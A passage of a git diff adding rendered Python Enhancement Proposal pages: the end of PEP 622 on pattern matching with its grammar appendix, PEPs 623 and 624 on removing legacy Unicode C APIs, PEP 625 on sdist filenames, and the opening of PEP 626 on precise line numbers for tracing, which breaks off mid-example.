These customized match behaviors would be controlled by a special +__match__ method on the class name. There were two competing variants:

+
    +
  • A ‘full-featured’ match protocol which would pass in not only +the subject to be matched, but detailed information about +which attributes the specified pattern was interested in.
  • +
  • A simplified match protocol, which only passed in the subject value, +and which returned a “proxy object” (which in most cases could be +just the subject) containing the matchable attributes.
  • +
+

Here’s an example of one version of the more complex protocol proposed:

+
match expr:
+    case BinaryOp(left=Number(value=x), op=op, right=Number(value=y)):
+        ...
+
+from types import PatternObject
+BinaryOp.__match__(
+    (),
+    {
+        "left": PatternObject(Number, (), {"value": ...}, -1, False),
+        "op": ...,
+        "right": PatternObject(Number, (), {"value": ...}, -1, False),
+    },
+    -1,
+    False,
+)
+
+
+

One drawback of this protocol is that the arguments to __match__ +would be expensive to construct, and could not be pre-computed due to +the fact that, because of the way names are bound, there are no real +constants in Python. It also meant that the __match__ method would +have to re-implement much of the logic of matching which would otherwise +be implemented in C code in the Python VM. As a result, this option would +perform poorly compared to an equivalent if-statement.

+

The simpler protocol suffered from the fact that although it was more +performant, it was much less flexible, and did not allow for many of +the creative custom matchers that people were dreaming up.

+

Late in the design process, however, it was realized that the need for +a custom matching protocol was much less than anticipated. Virtually +all the realistic (as opposed to fanciful) uses cases brought up could +be handled by the built-in matching behavior, although in a few cases +an extra guard condition was required to get the desired effect.

+

Moreover, it turned out that none of the standard library classes really +needed any special matching support other than an appropriate +__match_args__ property.

+

The decision to postpone this feature came with a realization that this is +not a one-way door; that a more flexible and customizable matching protocol +can be added later, especially as we gain more experience with real-world +use cases and actual user needs.

+

The authors of this PEP expect that the match statement will evolve +over time as usage patterns and idioms evolve, in a way similar to what +other “multi-stage” PEPs have done in the past. When this happens, the +extended matching issue can be revisited.

+
+
+

Parameterized Matching Syntax

+

(Also known as “Class Instance Matchers”.)

+

This is another variant of the “custom match classes” idea that would allow +diverse kinds of custom matchers mentioned in the previous section – however, +instead of using an extended matching protocol, it would be achieved by +introducing an additional pattern type with its own syntax. This pattern type +would accept two distinct sets of parameters: one set which consists of the +actual parameters passed into the pattern object’s constructor, and another +set representing the binding variables for the pattern.

+

The __match__ method of these objects could use the constructor parameter +values in deciding what was a valid match.

+

This would allow patterns such as InRange<0, 6>(value), which would match +a number in the range 0..6 and assign the matched value to ‘value’. Similarly, +one could have a pattern which tests for the existence of a named group in +a regular expression match result (different meaning of the word ‘match’).

+

Although there is some support for this idea, there was a lot of bikeshedding +on the syntax (there are not a lot of attractive options available) +and no clear consensus was reached, so it was decided that for now, this +feature is not essential to the PEP.

+
+
+

Pattern Utility Library

+

Both of the previous ideas would be accompanied by a new Python standard +library module which would contain a rich set of useful matchers. +However, it is not really possible to implement such a library without +adopting one of the extended pattern proposals given in the previous sections, +so this idea is also deferred.

+
+
+
+

Acknowledgments

+

We are grateful for the help of the following individuals (among many +others) for helping out during various phases of the writing of this +PEP:

+
    +
  • Gregory P. Smith
  • +
  • Jim Jewett
  • +
  • Mark Shannon
  • +
  • Nate Lust
  • +
  • Taine Zhao
  • +
+
+
+

Version History

+
    +
  1. Initial version
  2. +
  3. Substantial rewrite, including:
      +
    • Minor clarifications, grammar and typo corrections
    • +
    • Rename various concepts
    • +
    • Additional discussion of rejected ideas, including:
        +
      • Why we choose _ for wildcard patterns
      • +
      • Why we choose | for OR patterns
      • +
      • Why we choose not to use special syntax for capture variables
      • +
      • Why this pattern matching operation and not others
      • +
      +
    • +
    • Clarify exception and side effect semantics
    • +
    • Clarify partial binding semantics
    • +
    • Drop restriction on use of _ in load contexts
    • +
    • Drop the default single positional argument being the whole +subject except for a handful of built-in types
    • +
    • Simplify behavior of __match_args__
    • +
    • Drop the __match__ protocol (moved to deferred ideas)
    • +
    • Drop ImpossibleMatchError exception
    • +
    • Drop leading dot for loads (moved to deferred ideas)
    • +
    • Reworked the initial sections (everything before syntax)
    • +
    • Added an overview of all the types of patterns before the +detailed description
    • +
    • Added simplified syntax next to the description of each pattern
    • +
    • Separate description of the wildcard from capture patterns
    • +
    • Added Daniel F Moisset as sixth co-author
    • +
    +
  4. +
+
+
+

References

+ +
+
+

Appendix A – Full Grammar

+

Here is the full grammar for match_stmt. This is an additional +alternative for compound_stmt. It should be understood that +match and case are soft keywords, i.e. they are not reserved +words in other grammatical contexts (including at the start of a line +if there is no colon where expected). By convention, hard keywords +use single quotes while soft keywords use double quotes.

+

Other notation used beyond standard EBNF:

+
    +
  • SEP.RULE+ is shorthand for RULE (SEP RULE)*
  • +
  • !RULE is a negative lookahead assertion
  • +
+
match_expr:
+    | star_named_expression ',' star_named_expressions?
+    | named_expression
+match_stmt: "match" match_expr ':' NEWLINE INDENT case_block+ DEDENT
+case_block: "case" patterns [guard] ':' block
+guard: 'if' named_expression
+patterns: value_pattern ',' [values_pattern] | pattern
+pattern: walrus_pattern | or_pattern
+walrus_pattern: NAME ':=' or_pattern
+or_pattern: '|'.closed_pattern+
+closed_pattern:
+    | capture_pattern
+    | literal_pattern
+    | constant_pattern
+    | group_pattern
+    | sequence_pattern
+    | mapping_pattern
+    | class_pattern
+capture_pattern: NAME !('.' | '(' | '=')
+literal_pattern:
+    | signed_number !('+' | '-')
+    | signed_number '+' NUMBER
+    | signed_number '-' NUMBER
+    | strings
+    | 'None'
+    | 'True'
+    | 'False'
+constant_pattern: attr !('.' | '(' | '=')
+group_pattern: '(' patterns ')'
+sequence_pattern: '[' [values_pattern] ']' | '(' ')'
+mapping_pattern: '{' items_pattern? '}'
+class_pattern:
+    | name_or_attr '(' ')'
+    | name_or_attr '(' ','.pattern+ ','? ')'
+    | name_or_attr '(' ','.keyword_pattern+ ','? ')'
+    | name_or_attr '(' ','.pattern+ ',' ','.keyword_pattern+ ','? ')'
+signed_number: NUMBER | '-' NUMBER
+attr: name_or_attr '.' NAME
+name_or_attr: attr | NAME
+values_pattern: ','.value_pattern+ ','?
+items_pattern: ','.key_value_pattern+ ','?
+keyword_pattern: NAME '=' or_pattern
+value_pattern: '*' capture_pattern | pattern
+key_value_pattern:
+    | (literal_pattern | constant_pattern) ':' or_pattern
+    | '**' capture_pattern
+
+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0622.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0623/index.html b/pep-0623/index.html new file mode 100644 index 00000000000..082dee4547b --- /dev/null +++ b/pep-0623/index.html @@ -0,0 +1,321 @@ + + + + + + + + PEP 623 – Remove wstr from Unicode | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 623 – Remove wstr from Unicode

+
+
Author:
+
Inada Naoki <songofacandy at gmail.com>
+
BDFL-Delegate:
+
Victor Stinner <vstinner at python.org>
+
Discussions-To:
+
Python-Dev thread
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
25-Jun-2020
+
Python-Version:
+
3.10
+
Resolution:
+
Python-Dev thread
+
+
+
+
Table of Contents +
+
+

Abstract

+

PEP 393 deprecated some unicode APIs, and introduced wchar_t *wstr, +and Py_ssize_t wstr_length in the Unicode structure to support +these deprecated APIs.

+

This PEP is planning removal of wstr, and wstr_length with +deprecated APIs using these members by Python 3.12.

+

Deprecated APIs which doesn’t use the members are out of scope because +they can be removed independently.

+
+
+

Motivation

+
+

Memory usage

+

str is one of the most used types in Python. Even most simple ASCII +strings have a wstr member. It consumes 8 bytes per string on 64-bit +systems.

+
+
+

Runtime overhead

+

To support legacy Unicode object, many Unicode APIs must call +PyUnicode_READY().

+

We can remove this overhead too by dropping support of legacy Unicode +object.

+
+
+

Simplicity

+

Supporting legacy Unicode object makes the Unicode implementation more +complex. +Until we drop legacy Unicode object, it is very hard to try other +Unicode implementation like UTF-8 based implementation in PyPy.

+
+
+
+

Rationale

+
+

Python 4.0 is not scheduled yet

+

PEP 393 introduced efficient internal representation of Unicode and +removed border between “narrow” and “wide” build of Python.

+

PEP 393 was implemented in Python 3.3 which is released in 2012. Old +APIs were deprecated since then, and the removal was scheduled in +Python 4.0.

+

Python 4.0 was expected as next version of Python 3.9 when PEP 393 +was accepted. But the next version of Python 3.9 is Python 3.10, +not 4.0. This is why this PEP schedule the removal plan again.

+
+
+

Python 2 reached EOL

+

Since Python 2 didn’t have PEP 393 Unicode implementation, legacy +APIs might help C extension modules supporting both of Python 2 and 3.

+

But Python 2 reached the EOL in 2020. We can remove legacy APIs kept +for compatibility with Python 2.

+
+
+
+

Plan

+
+

Python 3.9

+

These macros and functions are marked as deprecated, using +Py_DEPRECATED macro.

+
    +
  • Py_UNICODE_WSTR_LENGTH()
  • +
  • PyUnicode_GET_SIZE()
  • +
  • PyUnicode_GetSize()
  • +
  • PyUnicode_GET_DATA_SIZE()
  • +
  • PyUnicode_AS_UNICODE()
  • +
  • PyUnicode_AS_DATA()
  • +
  • PyUnicode_AsUnicode()
  • +
  • _PyUnicode_AsUnicode()
  • +
  • PyUnicode_AsUnicodeAndSize()
  • +
  • PyUnicode_FromUnicode()
  • +
+
+
+

Python 3.10

+
    +
  • Following macros, enum members are marked as deprecated. +Py_DEPRECATED(3.10) macro are used as possible. But they +are deprecated only in comment and document if the macro can +not be used easily.
      +
    • PyUnicode_WCHAR_KIND
    • +
    • PyUnicode_READY()
    • +
    • PyUnicode_IS_READY()
    • +
    • PyUnicode_IS_COMPACT()
    • +
    +
  • +
  • PyUnicode_FromUnicode(NULL, size) and +PyUnicode_FromStringAndSize(NULL, size) emit +DeprecationWarning when size > 0.
  • +
  • PyArg_ParseTuple() and PyArg_ParseTupleAndKeywords() emit +DeprecationWarning when u, u#, Z, and Z# formats are used.
  • +
+
+
+

Python 3.12

+
    +
  • Following members are removed from the Unicode structures:
      +
    • wstr
    • +
    • wstr_length
    • +
    • state.compact
    • +
    • state.ready
    • +
    +
  • +
  • The PyUnicodeObject structure is removed.
  • +
  • Following macros and functions, and enum members are removed:
      +
    • Py_UNICODE_WSTR_LENGTH()
    • +
    • PyUnicode_GET_SIZE()
    • +
    • PyUnicode_GetSize()
    • +
    • PyUnicode_GET_DATA_SIZE()
    • +
    • PyUnicode_AS_UNICODE()
    • +
    • PyUnicode_AS_DATA()
    • +
    • PyUnicode_AsUnicode()
    • +
    • _PyUnicode_AsUnicode()
    • +
    • PyUnicode_AsUnicodeAndSize()
    • +
    • PyUnicode_FromUnicode()
    • +
    • PyUnicode_WCHAR_KIND
    • +
    • PyUnicode_READY()
    • +
    • PyUnicode_IS_READY()
    • +
    • PyUnicode_IS_COMPACT()
    • +
    +
  • +
  • PyUnicode_FromStringAndSize(NULL, size)) raises +RuntimeError when size > 0.
  • +
  • PyArg_ParseTuple() and PyArg_ParseTupleAndKeywords() raise +SystemError when u, u#, Z, and Z# formats are used, +as other unsupported format character.
  • +
+
+
+
+

Discussion

+ +
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0623.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0624/index.html b/pep-0624/index.html new file mode 100644 index 00000000000..ba8dbb96e2e --- /dev/null +++ b/pep-0624/index.html @@ -0,0 +1,487 @@ + + + + + + + + PEP 624 – Remove Py_UNICODE encoder APIs | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 624 – Remove Py_UNICODE encoder APIs

+
+
Author:
+
Inada Naoki <songofacandy at gmail.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
06-Jul-2020
+
Python-Version:
+
3.11
+
Post-History:
+
08-Jul-2020
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes to remove deprecated Py_UNICODE encoder APIs in Python 3.11:

+
    +
  • PyUnicode_Encode()
  • +
  • PyUnicode_EncodeASCII()
  • +
  • PyUnicode_EncodeLatin1()
  • +
  • PyUnicode_EncodeUTF7()
  • +
  • PyUnicode_EncodeUTF8()
  • +
  • PyUnicode_EncodeUTF16()
  • +
  • PyUnicode_EncodeUTF32()
  • +
  • PyUnicode_EncodeUnicodeEscape()
  • +
  • PyUnicode_EncodeRawUnicodeEscape()
  • +
  • PyUnicode_EncodeCharmap()
  • +
  • PyUnicode_TranslateCharmap()
  • +
  • PyUnicode_EncodeDecimal()
  • +
  • PyUnicode_TransformDecimalToASCII()
  • +
+
+

Note

+

PEP 623 propose to remove +Unicode object APIs relating to Py_UNICODE. On the other hand, this PEP +is not relating to Unicode object. These PEPs are split because they have +different motivations and need different discussions.

+
+
+
+

Motivation

+

In general, reducing the number of APIs that have been deprecated for +a long time and have few users is a good idea for not only it +improves the maintainability of CPython, but it also helps API users +and other Python implementations.

+
+
+

Rationale

+
+

Deprecated since Python 3.3

+

Py_UNICODE and APIs using it has been deprecated since Python 3.3.

+
+
+

Inefficient

+

All of these APIs are implemented using PyUnicode_FromWideChar. +So these APIs are inefficient when user want to encode Unicode +object.

+
+
+

Not used widely

+

When searching from the top 4000 PyPI packages [1], only pyodbc use +these APIs.

+
    +
  • PyUnicode_EncodeUTF8()
  • +
  • PyUnicode_EncodeUTF16()
  • +
+

pyodbc uses these APIs to encode Unicode object into bytes object. +So it is easy to fix it. [2]

+
+
+
+

Alternative APIs

+

There are alternative APIs to accept PyObject *unicode instead of +Py_UNICODE *. Users can migrate to them.

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
Deprecated APIAlternative APIs
PyUnicode_Encode()PyUnicode_AsEncodedString()
PyUnicode_EncodeASCII()PyUnicode_AsASCIIString() (1)
PyUnicode_EncodeLatin1()PyUnicode_AsLatin1String() (1)
PyUnicode_EncodeUTF7()(2)
PyUnicode_EncodeUTF8()PyUnicode_AsUTF8String() (1)
PyUnicode_EncodeUTF16()PyUnicode_AsUTF16String() (3)
PyUnicode_EncodeUTF32()PyUnicode_AsUTF32String() (3)
PyUnicode_EncodeUnicodeEscape()PyUnicode_AsUnicodeEscapeString()
PyUnicode_EncodeRawUnicodeEscape()PyUnicode_AsRawUnicodeEscapeString()
PyUnicode_EncodeCharmap()PyUnicode_AsCharmapString() (1)
PyUnicode_TranslateCharmap()PyUnicode_Translate()
PyUnicode_EncodeDecimal()(4)
PyUnicode_TransformDecimalToASCII()(4)
+

Notes:

+
    +
  1. const char *errors parameter is missing.
  2. +
  3. There is no public alternative API. But user can use generic +PyUnicode_AsEncodedString() instead.
  4. +
  5. const char *errors, int byteorder parameters are missing.
  6. +
  7. There is no direct replacement. But Py_UNICODE_TODECIMAL +can be used instead. CPython uses +_PyUnicode_TransformDecimalAndSpaceToASCII for converting +from Unicode to numbers instead.
  8. +
+
+
+

Plan

+

Remove these APIs in Python 3.11. They have been deprecated already.

+
    +
  • PyUnicode_Encode()
  • +
  • PyUnicode_EncodeASCII()
  • +
  • PyUnicode_EncodeLatin1()
  • +
  • PyUnicode_EncodeUTF7()
  • +
  • PyUnicode_EncodeUTF8()
  • +
  • PyUnicode_EncodeUTF16()
  • +
  • PyUnicode_EncodeUTF32()
  • +
  • PyUnicode_EncodeUnicodeEscape()
  • +
  • PyUnicode_EncodeRawUnicodeEscape()
  • +
  • PyUnicode_EncodeCharmap()
  • +
  • PyUnicode_TranslateCharmap()
  • +
  • PyUnicode_EncodeDecimal()
  • +
  • PyUnicode_TransformDecimalToASCII()
  • +
+
+
+

Alternative Ideas

+
+

Replace Py_UNICODE* with PyObject*

+

As described in the “Alternative APIs” section, some APIs don’t have +public alternative APIs accepting PyObject *unicode input. +And some public alternative APIs have restrictions like missing +errors and byteorder parameters.

+

Instead of removing deprecated APIs, we can reuse their names for +alternative public APIs.

+

Since we have private alternative APIs already, it is just renaming +from private name to public and deprecated names.

+ + + + + + + + + + + + + + + + + + + + + + + + + + +
Rename toRename from
PyUnicode_EncodeASCII()_PyUnicode_AsASCIIString()
PyUnicode_EncodeLatin1()_PyUnicode_AsLatin1String()
PyUnicode_EncodeUTF7()_PyUnicode_EncodeUTF7()
PyUnicode_EncodeUTF8()_PyUnicode_AsUTF8String()
PyUnicode_EncodeUTF16()_PyUnicode_EncodeUTF16()
PyUnicode_EncodeUTF32()_PyUnicode_EncodeUTF32()
+

Pros:

+
    +
  • We have a more consistent API set.
  • +
+

Cons:

+
    +
  • Backward incompatible.
  • +
  • We have more public APIs to maintain for rare use cases.
  • +
  • Existing public APIs are enough for most use cases, and +PyUnicode_AsEncodedString() can be used in other cases.
  • +
+
+
+

Replace Py_UNICODE* with Py_UCS4*

+

We can replace Py_UNICODE with Py_UCS4 and undeprecate +these APIs.

+

UTF-8, UTF-16, UTF-32 encoders support Py_UCS4 internally. +So PyUnicode_EncodeUTF8(), PyUnicode_EncodeUTF16(), and +PyUnicode_EncodeUTF32() can avoid to create a temporary Unicode +object.

+

Pros:

+
    +
  • We can avoid creating temporary Unicode object when encoding from +Py_UCS4* into bytes object with UTF-8, UTF-16, UTF-32 codecs.
  • +
+

Cons:

+
    +
  • Backward incompatible.
  • +
  • We have more public APIs to maintain for rare use cases.
  • +
  • Other Python implementations that want to support Python/C API need +to support these APIs too.
  • +
  • If we change the Unicode internal representation to UTF-8 in the +future, we need to keep UCS-4 support only for these APIs.
  • +
+
+
+

Replace Py_UNICODE* with wchar_t*

+

We can replace Py_UNICODE with wchar_t. Since Py_UNICODE +is typedef of wchar_t already, this is status quo.

+

On platforms where sizeof(wchar_t) == 4, we can avoid to create a +temporary Unicode object when encoding from wchar_t* to bytes +objects using UTF-8, UTF-16, and UTF-32 codec, like the “Replace +Py_UNICODE* with Py_UCS4*” idea.

+

Pros:

+
    +
  • Backward compatible.
  • +
  • We can avoid creating temporary Unicode object when encode from +Py_UCS4* into bytes object with UTF-8, UTF-16, UTF-32 codecs +on platform where sizeof(wchar_t) == 4.
  • +
+

Cons:

+
    +
  • Although Windows is the most major platform that uses wchar_t +heavily, these APIs need to create a temporary Unicode object +always because sizeof(wchar_t) == 2 on Windows.
  • +
  • We have more public APIs to maintain for rare use cases.
  • +
  • Other Python implementations that want to support Python/C API need +to support these APIs too.
  • +
  • If we change the Unicode internal representation to UTF-8 in the +future, we need to keep UCS-4 support only for these APIs.
  • +
+
+
+
+

Rejected Ideas

+
+

Emit runtime warning

+

In addition to existing compiler warning, emitting runtime +DeprecationWarning is suggested.

+

But these APIs doesn’t release GIL for now. Emitting a warning from +such APIs is not safe. See this example.

+
PyObject *u = PyList_GET_ITEM(list, i);  // u is borrowed reference.
+PyObject *b = PyUnicode_EncodeUTF8(PyUnicode_AS_UNICODE(u),
+        PyUnicode_GET_SIZE(u), NULL);
+// Assumes u is still living reference.
+PyObject *t = PyTuple_Pack(2, u, b);
+Py_DECREF(b);
+return t;
+
+
+

If we emit Python warning from PyUnicode_EncodeUTF8(), warning +filters and other threads may change the list and u can be +a dangling reference after PyUnicode_EncodeUTF8() returned.

+
+
+
+

Discussions

+ +
+

Objections

+
    +
  • Removing these APIs removes ability to use codec without temporary +Unicode.
      +
    • Codecs can not encode Unicode buffer directly without temporary +Unicode object since Python 3.3. All these APIs creates temporary +Unicode object for now. So removing them doesn’t reduce any +abilities.
    • +
    +
  • +
  • Why not remove decoder APIs too?
      +
    • They are part of stable ABI.
    • +
    • PyUnicode_DecodeASCII() and PyUnicode_DecodeUTF8() are +used very widely. Deprecating them is not worth enough.
    • +
    • Decoder APIs can decode from byte buffer directly, without +creating temporary bytes object. On the other hand, encoder APIs +can not avoid temporary Unicode object.
    • +
    +
  • +
+
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0624.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0625/index.html b/pep-0625/index.html new file mode 100644 index 00000000000..6563630dd61 --- /dev/null +++ b/pep-0625/index.html @@ -0,0 +1,305 @@ + + + + + + + + PEP 625 – Filename of a Source Distribution | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 625 – Filename of a Source Distribution

+
+
Author:
+
Tzu-ping Chung <uranusjr at gmail.com>, +Paul Moore <p.f.moore at gmail.com>
+
PEP-Delegate:
+
Pradyun Gedam <pradyunsg at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Accepted
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
08-Jul-2020
+
Post-History:
+
08-Jul-2020
+
Resolution:
+
Discourse message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP describes a standard naming scheme for a Source Distribution, also +known as an sdist. An sdist is distinct from an arbitrary archive file +containing source code of Python packages, and can be used to communicate +information about the distribution to packaging tools.

+

A standard sdist specified here is a gzipped tar file with a specially +formatted filename and the usual .tar.gz suffix. This PEP does not specify +the contents of the tarball, as that is covered in other specifications.

+
+
+

Motivation

+

An sdist is a Python package distribution that contains “source code” of the +Python package, and requires a build step to be turned into a wheel on +installation. This format is often considered as an unbuilt counterpart of a +PEP 427 wheel, and given special treatments in various parts of the +packaging ecosystem.

+

The content of an sdist is specified in PEP 517 and PEP 643, but currently +the filename of the sdist is incompletely specified, meaning that consumers +of the format must download and process the sdist to confirm the name and +version of the distribution included within.

+

Installers currently rely on heuristics to infer the name and/or version from +the filename, to help the installation process. pip, for example, parses the +filename of an sdist from a PEP 503 index, to obtain the distribution’s +project name and version for dependency resolution purposes. But due to the +lack of specification, the installer does not have any guarantee as to the +correctness of the inferred data, and must verify it at some point by locally +building the distribution metadata.

+

This build step is awkward for a certain class of operations, when the user +does not expect the build process to occur. pypa/pip#8387 describes an +example. The command pip download --no-deps --no-binary=numpy numpy is +expected to only download an sdist for numpy, since we do not need to check +for dependencies, and both the name and version are available by introspecting +the downloaded filename. pip, however, cannot assume the downloaded archive +follows the convention, and must build and check the metadata. For a PEP 518 +project, this means running the prepare_metadata_for_build_wheel hook +specified in PEP 517, which incurs significant overhead.

+
+
+

Rationale

+

By creating a special filename scheme for the sdist format, this PEP frees up +tools from the time-consuming metadata verification step when they only need +the metadata available in the filename.

+

This PEP also serves as the formal specification to the long-standing +filename convention used by the current sdist implementations. The filename +contains the distribution name and version, to aid tools identifying a +distribution without needing to download, unarchive the file, and perform +costly metadata generation for introspection, if all the information they need +is available in the filename.

+
+
+

Specification

+

The name of an sdist should be {distribution}-{version}.tar.gz.

+
    +
  • distribution is the name of the distribution as defined in PEP 345, +and normalised as described in the wheel spec e.g. 'pip', +'flit_core'.
  • +
  • version is the version of the distribution as defined in PEP 440, +e.g. 20.2, and normalised according to the rules in that PEP.
  • +
+

An sdist must be a gzipped tar archive in pax format, that is able to be +extracted by the standard library tarfile module with the open flag +'r:gz'.

+

Code that produces an sdist file MUST give the file a name that matches this +specification. The specification of the build_sdist hook from PEP 517 is +extended to require this naming convention.

+

Code that processes sdist files MAY determine the distribution name and version +by simply parsing the filename, and is not required to verify that information +by generating or reading the metadata from the sdist contents.

+

Conforming sdist files can be recognised by the presence of the .tar.gz +suffix and a single hyphen in the filename. Note that some legacy files may +also match these criteria, but this is not expected to be an issue in practice. +See the “Backwards Compatibility” section of this document for more details.

+
+
+

Backwards Compatibility

+

The new filename scheme is a subset of the current informal naming +convention for sdist files, so tools that create or publish files conforming +to this standard will be readable by older tools that only understand the +previous naming conventions.

+

Tools that consume sdist filenames would technically not be able to determine +whether a file is using the new standard or a legacy form. However, a review +of the filenames on PyPI determined that 37% of files are obviously legacy +(because they contain multiple or no hyphens) and of the remainder, parsing +according to this PEP gives the correct answer in all but 0.004% of cases.

+

Currently, tools that consume sdists should, if they are to be fully correct, +treat the name and version parsed from the filename as provisional, and verify +them by downloading the file and generating the actual metadata (or reading it, +if the sdist conforms to PEP 643). Tools supporting this specification can +treat the name and version from the filename as definitive. In theory, this +could risk mistakes if a legacy filename is assumed to conform to this PEP, +but in practice the chance of this appears to be vanishingly small.

+
+
+

Rejected Ideas

+
+

Rely on the specification for sdist metadata

+

Since this PEP was first written, PEP 643 has been accepted, defining a +trustworthy, standard sdist metadata format. This allows distribution metadata +(and in particular name and version) to be determined statically.

+

This is not considered sufficient, however, as in a number of significant +cases (for example, reading filenames from a package index) the application +only has access to the filename, and reading metadata would involve a +potentially costly download.

+
+
+

Use a dedicated file extension

+

The original version of this PEP proposed a filename of +{distribution}-{version}.sdist. This has the advantage of being explicit, +as well as allowing a future change to the storage format without needing a +further change of the file naming convention.

+

However, there are significant compatibility issues with a new extension. Index +servers may currently disallow unknown extensions, and if we introduced a new +one, it is not clear how to handle cases like a legacy index trying to mirror an +index that hosts new-style sdists. Is it acceptable to only partially mirror, +omitting sdists for newer versions of projects? Also, build backends that produce +the new format would be incompaible with index servers that only accept the old +format, and as there is often no way for a user to request an older version of a +backend when doing a build, this could make it impossible to build and upload +sdists.

+
+
+

Augment a currently common sdist naming scheme

+

A scheme {distribution}-{version}.sdist.tar.gz was raised during the +initial discussion. This was abandoned due to backwards compatibility issues +with currently available installation tools. pip 20.1, for example, would +parse distribution-1.0.sdist.tar.gz as project distribution with +version 1.0.sdist. This would cause the sdist to be downloaded, but fail to +install due to inconsistent metadata.

+

The main advantage of this proposal was that it is easier for tools to +recognise the new-style naming. But this is not a particularly significant +benefit, given that all sdists with a single hyphen in the name are parsed +the same way under the old and new rules.

+
+
+
+

Open Issues

+

The contents of an sdist are required to contain a single top-level directory +named {name}-{version}. Currently no normalisation rules are required +for the components of this name. Should this PEP require that the same normalisation +rules are applied here as for the filename? Note that in practice, it is likely +that tools will create the two names using the same code, so normalisation is +likely to happen naturally, even if it is not explicitly required.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0625.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0626/index.html b/pep-0626/index.html new file mode 100644 index 00000000000..4072955ebad --- /dev/null +++ b/pep-0626/index.html @@ -0,0 +1,479 @@ + + + + + + + + PEP 626 – Precise line numbers for debugging and other tools. | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 626 – Precise line numbers for debugging and other tools.

+
+
Author:
+
Mark Shannon <mark at hotpy.org>
+
BDFL-Delegate:
+
Pablo Galindo <pablogsal at python.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
15-Jul-2020
+
Python-Version:
+
3.10
+
Post-History:
+
17-Jul-2020
+
+
+
+
Table of Contents +
+
+

Abstract

+

Python should guarantee that when tracing is turned on, “line” tracing events are generated for all lines of code executed and only for lines of +code that are executed.

+

The f_lineno attribute of frame objects should always contain the expected line number. +During frame execution, the expected line number is the line number of source code currently being executed. +After a frame has completed, either by returning or by raising an exception, +the expected line number is the line number of the last line of source that was executed.

+

A side effect of ensuring correct line numbers, is that some bytecodes will need to be marked as artificial, and not have a meaningful line number. +To assist tools, a new co_lines attribute will be added that describes the mapping from bytecode to source.

+
+
+

Motivation

+

Users of sys.settrace and associated tools should be able to rely on tracing events being +generated for all lines of code, and only for actual code. +They should also be able to assume that the line number in f_lineno is correct.

+

The current implementation mostly does this, but fails in a few cases. +This requires workarounds in tooling and is a nuisance for alternative Python implementations.

+

Having this guarantee also benefits implementers of CPython in the long term, as the current behaviour is not obvious and has some odd corner cases.

+
+
+

Rationale

+

In order to guarantee that line events are generated when expected, the co_lnotab attribute, in its current form, +can no longer be the source of truth for line number information.

+

Rather than attempt to fix the co_lnotab attribute, a new method +co_lines() will be added, which returns an iterator over bytecode offsets and source code lines.

+

Ensuring that the bytecode is annotated correctly to enable accurate line number information means that +some bytecodes must be marked as artificial, and not have a line number.

+

Some care must be taken not to break existing tooling. +To minimize breakage, the co_lnotab attribute will be retained, but lazily generated on demand.

+
+
+

Specification

+

Line events and the f_lineno attribute should act as an experienced Python user would expect in all cases.

+
+

Tracing

+

Tracing generates events for calls, returns, exceptions, lines of source code executed, and, under some circumstances, instructions executed.

+

Only line events are covered by this PEP.

+

When tracing is turned on, line events will be generated when:

+
    +
  • A new line of source code is reached.
  • +
  • A backwards jump occurs, even if it jumps to the same line, as may happen in list comprehensions.
  • +
+

Additionally, line events will never be generated for source code lines that are not executed.

+
+
+

What is considered to be code for the purposes of tracing

+

All expressions and parts of expressions are considered to be executable code.

+

In general, all statements are also considered to be executable code. However, when a statement is spread over several lines, +we must consider which parts of a statement are considered to be executable code.

+

Statements are made up of keywords and expressions. Not all keywords have a direct runtime effect, so not all keywords are considered to be executable code. +For example, else, is a necessary part of an if statement, but there is no runtime effect associated with an else.

+

For the purposes of tracing, the following keywords will not be considered to be executable code:

+
    +
  • del – The expression to be deleted is treated as the executable code.
  • +
  • else – No runtime effect
  • +
  • finally – No runtime effect
  • +
  • global – Purely declarative
  • +
  • nonlocal – Purely declarative
  • +
+

All other keywords are considered to be executable code.

+
+
+

Example event sequences

+

In the following examples, events are listed as “name”, f_lineno pairs.

+

The code

+
1.     global x
+2.     x = a
+
+
+

generates the following event:

+
"line" 2
+
+
+

The code

+
1.     try:
+2.        pass
+3.     finally:
+4.        pass
+
+
+

generates the following events:

+
"line" 1
+"line" 2
+"line" 4
+
+
+

The code

+
1.      for (
+2.          x) in [1]:
+3.          pass
+4.      return
+
+
+

generates the following events:

+
"line" 2       # evaluate [1]
+"line" 1       # for
+"line" 2       # store to x
